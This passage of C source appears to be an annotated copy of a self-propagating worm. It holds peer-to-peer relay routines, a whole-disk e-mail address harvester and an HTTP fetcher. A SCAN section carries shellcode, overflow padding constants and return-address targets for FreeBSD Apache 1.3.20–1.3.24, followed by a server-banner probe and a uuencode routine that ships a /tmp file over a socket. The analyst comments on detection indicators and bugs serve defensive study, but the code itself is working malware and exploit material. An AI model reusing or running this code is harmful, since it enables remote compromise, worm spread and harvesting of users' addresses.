if (a == 127 || a == 10 || a == 0) return 0;
if (a == 172 && b >= 16 && b <= 31) return 0;
if (a == 192 && b == 168) return 0;
return 1;
}
/*
 * Relay one message to a random contiguous window of the peer table.
 *
 * buf/len: message bytes handed unchanged to relay() for each chosen peer.
 * The window size is numlinks/5, clamped to 4..50 and then capped at
 * numlinks; its start index is random. links, numlinks, myip and relay()
 * are defined outside this listing.
 *
 * Analyst note: one call produces at most 50 outbound relay() sends, so a
 * single message fans out as a short burst to a subset of known peers
 * rather than to every peer.
 */
void broadcast(char *buf,unsigned long len) {
unsigned long nics,a;
/* nothing to do without a peer table */
if (numlinks == 0 || links == NULL) return;
a=(numlinks/5);
if (a > 50) a=50;
else if (a < 4) a=4;
if (a > numlinks) a=numlinks;
/* nics becomes the random start index, a the exclusive end index */
nics=rand()%((numlinks-a)+1);
a+=nics;
/* skip the entry equal to myip when myip is set */
for (;nics<a;nics++) if (!myip || links[nics] != myip) relay(links[nics],buf,len);
}
/*
 * Wrap a payload in a route_rec header addressed to `dest` and hand it to
 * broadcast().
 *
 * dest: value stored in rc.server.
 * buf/len: payload appended directly after the header.
 *
 * Header fields set here: tag 0x26, a rand() id, a sequence number from
 * newseq(), hops 5, and len = header size + payload size. struct route_rec,
 * newseq() and FREE are defined outside this listing.
 *
 * Analyst note: the constant tag 0x26 and the initial hop count 5 are fixed
 * values in every record built here, which makes them candidates for
 * protocol signatures; the header layout itself is not shown in this chunk.
 */
void broute(unsigned long dest, char *buf,unsigned long len) {
struct route_rec rc;
/* one byte more than is ever written or sent */
char *str=(char*)malloc(sizeof(struct route_rec)+len+1);
if (str == NULL) return;
memset((void*)&rc,0,sizeof(struct route_rec));
rc.h.tag=0x26;
rc.h.id=rand();
/* NOTE(review): len counts header + payload here; width of h.len is not visible, so truncation for large len cannot be ruled out */
rc.h.len=sizeof(struct route_rec)+len;
rc.h.seq=newseq();
rc.server=dest;
rc.hops=5;
memcpy((void*)str,(void*)&rc,sizeof(struct route_rec));
memcpy((void*)(str+sizeof(struct route_rec)),(void*)buf,len);
broadcast(str,sizeof(struct route_rec)+len);
FREE(str);
}
/*
 * Send the peer table to one endpoint in chunks of at most 700 entries.
 *
 * inst: destination; its sin_addr is used with relay() when id is 0,
 *       otherwise the record goes out through audp_send(inst, ...).
 * tag, id: copied into each record header.
 *
 * Each record is an addsrv_rec header followed by one next_rec (a single
 * unsigned long) per table entry; h.len holds the size of the entries only.
 * links, numlinks, relay(), audp_send() and FREE are defined outside this
 * listing.
 *
 * Analyst note: a full table transfer appears on the wire as a series of
 * records of up to sizeof(struct addsrv_rec) + 700*sizeof(unsigned long)
 * bytes each, so its size discloses how many peers the sender knows.
 */
void syncm(struct ainst *inst,char tag,int id) {
struct addsrv_rec rc;
struct next_rec { unsigned long server; } fc;
unsigned long a,b;
for (b=0;;b+=700) {
/* computed before the bounds check below; wraps when b > numlinks, but that case breaks out first */
unsigned long _numlinks=numlinks-b>700?700:numlinks-b;
unsigned long *_links=links+b;
unsigned char *str;
/* NOTE(review): the test is '>' so b == numlinks (including an empty table) still sends a header-only record */
if (b > numlinks) break;
str=(unsigned char*)malloc(sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
/* allocation failure abandons the remaining chunks silently */
if (str == NULL) return;
memset((void*)&rc,0,sizeof(struct addsrv_rec));
rc.h.tag=tag;
rc.h.id=id;
rc.h.len=sizeof(struct next_rec)*_numlinks;
memcpy((void*)str,(void*)&rc,sizeof(struct addsrv_rec));
for (a=0;a<_numlinks;a++) {
memset((void*)&fc,0,sizeof(struct next_rec));
fc.server=_links[a];
memcpy((void*)(str+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec))),(void*)&fc,sizeof(struct next_rec));
}
/* id 0 selects relay() to the peer address, any other id selects audp_send() */
if (!id) relay(inst->in.sin_addr.s_addr,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
else audp_send(inst,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
FREE(str);
}
}
/*
 * Send a text message as a data_rec record with tag 0x45.
 *
 * inst: not used in this function; the record always goes to the global
 *       udpclient.
 * id:   copied into the record header.
 * buf2: NUL-terminated message; a strdup() copy is passed through
 *       _encrypt() and that transformed copy is what gets sent.
 *
 * struct data_rec, _encrypt(), newseq(), audp_send(), udpclient and FREE
 * are defined outside this listing.
 *
 * Analyst note: the payload after the header is the output of _encrypt(),
 * so message text will not appear in clear in captures; the header tag
 * 0x45 and h.len (the plaintext length) are set before that step.
 */
void senderror(struct ainst *inst, int id, char *buf2) {
struct data_rec rc;
/* NOTE(review): strdup() result is not checked before it is used below */
char *str,*buf=strdup(buf2);
memset((void*)&rc,0,sizeof(struct data_rec));
rc.h.tag=0x45;
rc.h.id=id;
rc.h.seq=newseq();
rc.h.len=strlen(buf2);
_encrypt(buf,strlen(buf2));
str=(char*)malloc(sizeof(struct data_rec)+strlen(buf2)+1);
if (str == NULL) {
/* NOTE(review): this releases the caller's buf2, not the local copy buf, which is leaked on this path; FREE's definition is not visible - confirm */
FREE(buf2);
return;
}
memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
memcpy((void*)(str+sizeof(struct data_rec)),buf,strlen(buf2));
audp_send(&udpclient,str,sizeof(struct data_rec)+strlen(buf2));
FREE(str);
FREE(buf);
}
/*
 * Character-class predicate: returns 1 when `a` is an ASCII letter, an
 * ASCII digit, or one of  . @ ^ - _  and 0 for every other value.
 */
int isgood(char a) {
	int is_lower = ('a' <= a && a <= 'z');
	int is_upper = ('A' <= a && a <= 'Z');
	int is_digit = ('0' <= a && a <= '9');

	if (is_lower || is_upper || is_digit)
		return 1;

	switch (a) {
	case '.':
	case '@':
	case '^':
	case '-':
	case '_':
		return 1;
	default:
		return 0;
	}
}
/*
 * Character-class predicate: returns 1 when `a` is a dot or an ASCII
 * letter, 0 otherwise (digits and all punctuation other than '.' fail).
 */
int islisten(char a) {
	int is_letter = ('a' <= a && a <= 'z') || ('A' <= a && a <= 'Z');

	return (a == '.' || is_letter) ? 1 : 0;
}
/*
 * Singly linked list of heap-allocated strings; linklist is the global
 * head and starts empty. AddToList() is the only writer visible in this
 * listing, and the strings it stores come from ScanFile().
 */
struct _linklist {
char *name;
struct _linklist *next;
} *linklist=NULL;
/*
 * Insert a copy of `str` at the head of the global linklist unless an
 * identical string is already present.
 *
 * str: NUL-terminated string; duplicated with strdup(), so the caller
 *      keeps ownership of its own buffer.
 *
 * The duplicate check is a linear strcmp() walk, so the list holds each
 * distinct string once. Nothing in this listing frees the nodes.
 */
void AddToList(char *str) {
struct _linklist *getb=linklist,*newb;
while(getb != NULL) {
if (!strcmp(str,getb->name)) return;
getb=getb->next;
}
/* NOTE(review): neither malloc() nor strdup() is checked; a failed malloc is dereferenced on the next line */
newb=(struct _linklist *)malloc(sizeof(struct _linklist));
newb->name=strdup(str);
newb->next=linklist;
linklist=newb;
}
/*
 * Intended to trim '\n', '\r' and ' ' from both ends of `buf` in place.
 *
 * buf: writable NUL-terminated string.
 *
 * NOTE(review): two memory-safety hazards are visible here.
 *  - For an empty string, strlen(buf)-1 wraps and the first loop reads
 *    (and may write) the byte before the buffer.
 *  - The inner for-loop starts at strlen(buf)+1 and increments, so when a
 *    leading whitespace character is present it reads and writes past the
 *    terminator instead of shifting the string left, and keeps going until
 *    the index wraps or the process faults.
 * In this listing the function receives text taken from a remote server's
 * response (see GetAddress), so the second case is reachable from network
 * input.
 */
void cleanup(char *buf) {
/* trailing trim: strlen() is recomputed on every test and every write */
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
unsigned long i;
for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
}
}
/*
 * Scan one file for e-mail-address-shaped strings and add each accepted
 * one to the global list through AddToList().
 *
 * f: path of the file to read; unreadable files are skipped silently.
 *
 * Method: the file is read one byte at a time. At every '@' the code steps
 * backwards while the preceding bytes satisfy isgood(), then reads forward
 * up to 255 bytes until the first byte that does not. The candidate is kept
 * only if it has at least one '.', exactly one '@', does not start with
 * '@' or '.', is not one hard-coded address, does not have a final label
 * beginning ".hlp" or ".gov", and has only letters and dots from the last
 * '.' onward (islisten()).
 *
 * Analyst note: on a host this shows up as sequential open/seek/read of
 * arbitrary regular files with no writes; the accepted strings exist only
 * in process memory at this point.
 */
void ScanFile(char *f) {
FILE *file=fopen(f,"r");
unsigned long startpos=0;
if (file == NULL) return;
while(1) {
char buf[2];
memset(buf,0,2);
/* re-seek to the scan position each round because the candidate parsing below moves the file offset */
fseek(file,startpos,SEEK_SET);
/* NOTE(review): fread() result is ignored; end of input is detected only through feof() */
fread(buf,1,1,file);
startpos++;
if (feof(file)) break;
if (*buf == '@') {
/* NOTE(review): c and d are plain char but are used as counters and, at the c=pos assignment, as an index up to 254; values above CHAR_MAX do not fit */
char email[256],c,d;
unsigned long pos=0;
/* walk backwards to the first byte of the candidate; stops at a non-isgood() byte or when the offset cannot move further back */
while(1) {
unsigned long oldpos=ftell(file);
fseek(file,-1,SEEK_CUR);
c=fgetc(file);
if (!isgood(c)) break;
fseek(file,-1,SEEK_CUR);
if (oldpos == ftell(file)) break;
}
/* read forward: c counts dots, d counts '@' signs; at most 255 bytes so email[pos]=0 below stays in bounds */
for (pos=0,c=0,d=0;pos<255;pos++) {
email[pos]=fgetc(file);
if (email[pos] == '.') c++;
if (email[pos] == '@') d++;
if (!isgood(email[pos])) break;
}
email[pos]=0;
if (c == 0 || d != 1) continue;
/* drop one trailing dot */
if (email[strlen(email)-1] == '.') email[strlen(email)-1]=0;
if (*email == '@' || *email == '.' || !*email) continue;
if (!strcmp(email,"webmaster@mydomain.com")) continue;
/* c is reused as the index of the last '.' */
for (pos=0,c=0;pos<strlen(email);pos++) if (email[pos] == '.') c=pos;
if (c == 0) continue;
if (!strncmp(email+c,".hlp",4)) continue;
if (!strncmp(email+c,".gov",4)) continue;
/* d is reused as a flag: set when the final label holds anything but letters and dots */
for (pos=c,d=0;pos<strlen(email);pos++) if (!islisten(email[pos])) d=1;
if (d == 1) continue;
AddToList(email);
}
}
fclose(file);
}
/*
 * Enumerate every regular file on the host and pass each path to
 * ScanFile(), skipping paths that begin with /proc, /dev or /bin.
 *
 * The file list comes from the output of `find / -type f`, started with
 * popen(). MAXPATH is defined outside this listing.
 *
 * Analyst note: popen() runs the command through the shell, so process
 * telemetry shows the host process spawning sh and then `find / -type f`,
 * followed by read access across the whole filesystem. That parent/child
 * pattern from a network-facing service account is a practical detection
 * point.
 */
void StartScan() {
FILE *f;
f=popen("find / -type f","r");
if (f == NULL) return;
while(1) {
char fullfile[MAXPATH];
memset(fullfile,0,MAXPATH);
/* NOTE(review): fgets() result is ignored; a path longer than MAXPATH-1 is split across iterations */
fgets(fullfile,MAXPATH,f);
if (feof(f)) break;
/* NOTE(review): if a line is empty after stripping, strlen()-1 wraps and the byte before the buffer is read */
while(fullfile[strlen(fullfile)-1]=='\n' ||
fullfile[strlen(fullfile)-1] == '\r')
fullfile[strlen(fullfile)-1]=0;
/* prefix tests, so e.g. any path starting with the characters "/bin" is skipped as well */
if (!strncmp(fullfile,"/proc",5)) continue;
if (!strncmp(fullfile,"/dev",4)) continue;
if (!strncmp(fullfile,"/bin",4)) continue;
ScanFile(fullfile);
}
/* NOTE(review): the stream is never passed to pclose(), so the child is not reaped here */
}
/*
 * Fetch a URL over plain HTTP on port 80, imitating one of two browsers,
 * and follow any Location header by calling itself again with the cookie
 * the server set.
 *
 * http:   URL, with or without a leading "http://". Modified in place: the
 *         first '/' after the host is overwritten with NUL.
 * cookie: optional cookie string, or NULL. Modified in place: cut at the
 *         first ';'.
 *
 * struct ainst, atcp_connect(), atcp_sendmsg() and FREE are defined outside
 * this listing. The response body is read and discarded; only the status
 * line, Set-Cookie and Location are parsed.
 *
 * Analyst note: the request is one of two fixed templates chosen at random,
 * each with a constant User-Agent (a Mozilla/4.75 string or a Lynx/2.8.4rel.1
 * string), a constant header order and HTTP/1.0. When a cookie is present the
 * request also carries a "Cookie2: $Version" header. Those literals are usable
 * as web-log and IDS indicators for traffic generated by this routine.
 *
 * NOTE(review): memory-safety problems that a hostile or merely unusual
 * server can trigger in this code:
 *  - sprintf() into additional[256] is unbounded, while the cookie passed on
 *    redirect can be up to 1023 bytes taken from a Set-Cookie header.
 *  - recv() may fill all 4096 bytes of buf, after which buf[i]=0 writes one
 *    byte past the array.
 *  - redirects are followed recursively with no depth limit, and location is
 *    not cleared after being followed.
 *  - no close of up.sock is visible in this function.
 */
void ViewWebsite(char *http,char *cookie) {
char *server,additional[256], cookies[1024], location[1024];
unsigned long j,i;
struct ainst up;
char num=0;
if (!strncmp(http,"http://",7)) server=http+7;
else server=http;
/* split host from path: after this, server is the host and server+i+num is the path (empty when the URL has no '/') */
for (i=0;i<strlen(server);i++) if (server[i] == '/') {
server[i]=0;
num+=1;
break;
}
memset(additional,0,256);
if (cookie) {
/* keep only the first name=value pair */
for (j=0;j<strlen(cookie);j++) if (cookie[j] == ';') {
cookie[j]=0;
break;
}
sprintf(additional,"Cookie2: $Version=\"1\"\r\nCookie: %s\r\n",cookie);
}
if (atcp_connect(&up,server,80) != 0) return;
if (rand()%2) {
atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n%s\r\n",server+i+num,server,additional);
}
else {
atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nHost: %s\r\nAccept: text/html, text/plain, text/sgml, */*;q=0.01\r\nAccept-Encoding: gzip, compress\r\nAccept-Language: en\r\nUser-Agent: Lynx/2.8.4rel.1 libwww-FM/2.14\r\n%s\r\n",server+i+num,server,additional);
}
memset(cookies,0,1024);
memset(location,0,1024);
while(1) {
fd_set n;
struct timeval tv;
FD_ZERO(&n);
FD_SET(up.sock,&n);
/* wait up to 20 minutes for more data before giving up */
tv.tv_sec=60*20;
tv.tv_usec=0;
if (select(up.sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) break;
if (FD_ISSET(up.sock,&n)) {
char buf[4096], *str;
/* this i shadows the outer i; it is unsigned, so a negative recv() result does not satisfy the <= 0 test as a negative number */
unsigned long code,i;
if ((i=recv(up.sock,buf,4096,0)) <= 0) break;
buf[i]=0;
/* every received chunk is parsed line by line as if it were headers */
str=strtok(buf,"\n");
while(str && *str) {
char name[1024], params[1024];
while(str[strlen(str)-1] == '\r' || str[strlen(str)-1] == '\n') str[strlen(str)-1] = 0;
/* split at the first ':' or '/', so the status line yields the name "HTTP" */
for (i=0;i<strlen(str);i++) if (str[i] == ':' || str[i] == '/') break;
str[i]=0;
if (strlen(str) < 1024) {
strcpy(name,str);
if (strlen(str+i+1) < 1024) {
if (str[i+1] == ' ') strcpy(params,str+i+2);
else strcpy(params,str+i+1);
/* code is assigned but not read anywhere in this function */
if (!strcmp(name,"HTTP")) code=atoi(params);
else if (!strcmp(name,"Set-Cookie")) strcpy(cookies,params);
else if (!strcmp(name,"Location")) strcpy(location,params);
}
}
str=strtok((char*)NULL,"\n");
}
if (*location) {
/* follow the redirect on copies, because the callee modifies both strings in place */
char *a=strdup(location),*b=strdup(cookies);
ViewWebsite(a,b);
FREE(a);
FREE(b);
}
}
}
}
/*
 * Everything from here on is compiled only when SCAN is defined; the
 * matching #endif is outside this listing.
 *
 * The constants below are sizes, repeat counts and fill bytes for a buffer
 * that is assembled elsewhere; none of their consumers appear in this chunk.
 * NOP is redefined to 0x41, the same byte as PADDING_1 ('A').
 *
 * PUT_STRING and PUT_BYTES append through a cursor named `p` that must be
 * in scope where they are used. NOTE(review): they perform no bounds check,
 * evaluate their arguments more than once, and expand to two statements
 * without a do { } while (0) wrapper, so they misbehave under an unbraced if.
 */
#ifdef SCAN
#define HOST_PARAM "Unknown"
#define RET_ADDR_INC 512
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#undef NOP
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
/*
 * Opaque machine-code payload stored as a byte string. It is data as far
 * as this listing is concerned: no code in this chunk reads it, and it is
 * not disassembled here.
 *
 * Analyst note: because the array is a fixed byte sequence, it is a stable
 * candidate for a content signature (file scan or memory scan) when hunting
 * for builds of this program compiled with SCAN defined.
 */
char shellcode[] =
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
"\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
"\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
"\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
"\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
"\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
"\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
"\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
/* stray empty declaration left by the author */
;
/*
 * Table of per-build parameter sets, plus `victim`, a single record of the
 * same anonymous struct type.
 *
 * type: human-readable platform and server banner the entry applies to.
 * delta, retaddr, repretaddr, repzero: numeric values consumed by code that
 * is not part of this chunk; their meaning is not established here.
 *
 * Analyst note: both entries name FreeBSD 4.5 x86 running Apache 1.3.20 or
 * 1.3.22-24, so these `type` strings state which server builds the program
 * is written against. Presumably they are compared with the Server banner
 * that GetAddress() returns - confirm against the caller.
 */
struct {
char *type;
int delta;
u_long retaddr;
int repretaddr;
int repzero;
} targets[] = {
{ "FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)", -146, 0xbfbfde00,6, 36 },
{ "FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)", -134, 0xbfbfdb00,3, 36 },
}, victim;
/*
 * Connect to `ip` on TCP port 80, send a bare GET request and return the
 * value of the response's Server header.
 *
 * ip: dotted-quad address string passed to inet_addr().
 * Returns a strdup()'d string the caller must free, or NULL when the
 * connect fails, nothing arrives within 15 seconds, the read fails, or no
 * "Server: " text is found in the first 1023 bytes.
 *
 * Analyst note: the probe is the literal request "GET / HTTP/1.1" followed
 * by an empty line, with no Host header and no other headers. An HTTP/1.1
 * request without Host is malformed, so access and error logs showing such
 * requests against port 80 are a usable indicator of this banner grab.
 * Suppressing or genericising the Server header removes the information
 * this function collects.
 *
 * NOTE(review): socket() is not checked, sin is not zeroed before use, and
 * no path in this function closes sock, so every call leaks a descriptor.
 */
char *GetAddress(char *ip) {
struct sockaddr_in sin;
fd_set fds;
int n,d,sock;
char buf[1024];
struct timeval tv;
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
/* zero-fill so the single read below always leaves a NUL-terminated buffer */
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
/* one read only: a banner arriving in a later segment is missed */
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
char *start=buf+d+strlen("Server: ");
/* d is reused; the loop ends at the first newline because writing NUL there shortens strlen(start) */
for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
/* cleanup() trims surrounding whitespace in place on server-supplied text */
cleanup(start);
return strdup(start);
}
}
}
return NULL;
}
/*
 * Map a value to a printable character: keep the low six bits and add the
 * space character, except that zero maps to a backtick. This is the
 * character mapping used by the uuencode text format.
 */
#define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
/*
 * Write one character to `sock`, preceded by a backslash when the
 * character is a backtick, a backslash or a dollar sign.
 *
 * Returns the result of the last write() performed: if the backslash
 * write returns 0 or a negative value, that value is returned and the
 * character itself is not written.
 */
int sendch(int sock,int buf) {
	char out;

	switch (buf) {
	case '`':
	case '\\':
	case '$': {
		int rc;

		out = '\\';
		rc = write(sock, &out, 1);
		if (rc <= 0)
			return rc;
		break;
	}
	default:
		break;
	}

	out = buf;
	return write(sock, &out, 1);
}
/*
 * Write the NUL-terminated string `str` to `sock` with a single write()
 * call and return that call's result (the terminator is not sent; short
 * writes are not retried).
 */
int writem(int sock, char *str) {
	size_t nbytes = strlen(str);

	return write(sock, str, nbytes);
}
int encode(int a) {
register int ch, n;
register char *p;
char buf[80];
FILE *in;
if ((in=fopen("/tmp/.a","r")) == NULL) return 0;
writem(a,"begin 655 .a\n");
while ((n = fread(buf, 1, 45, in))) {
ch = ENC(n);
if (sendch(a,ch) <= ASUCCESS) break;
for (p = buf; n > 0; n -= 3, p += 3) {
if (n < 3) {
p[2] = '\0';
if (n < 2) p[1] = '\0';
}